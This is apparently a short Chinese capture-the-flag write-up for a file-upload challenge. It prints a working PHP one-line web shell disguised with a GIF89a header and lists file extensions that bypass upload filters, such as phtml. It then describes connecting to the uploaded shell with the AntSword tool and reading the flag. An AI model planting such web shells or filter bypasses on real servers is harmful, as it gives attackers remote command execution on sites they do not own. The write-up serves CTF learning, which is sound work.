看题目是一件文件上传题,让上传头像,那就传个一句话木马
常用的木马网上也有,这里给出一个这道题用的一个
GIF89a?
<script language="php">eval($_REQUEST[pass])</script>
一般绕过后缀名检测有php,php3,php5,pht,phtml
等几种类型,这里采用phtml
上传成功,拿出蚁剑连接一下
http://xxx(题目的链接)/upload/22.phtml
成功后选择在虚拟终端打开,cat flag
拿到flag{49f67b50-7e32-4cac-8241-ac54375cd08d}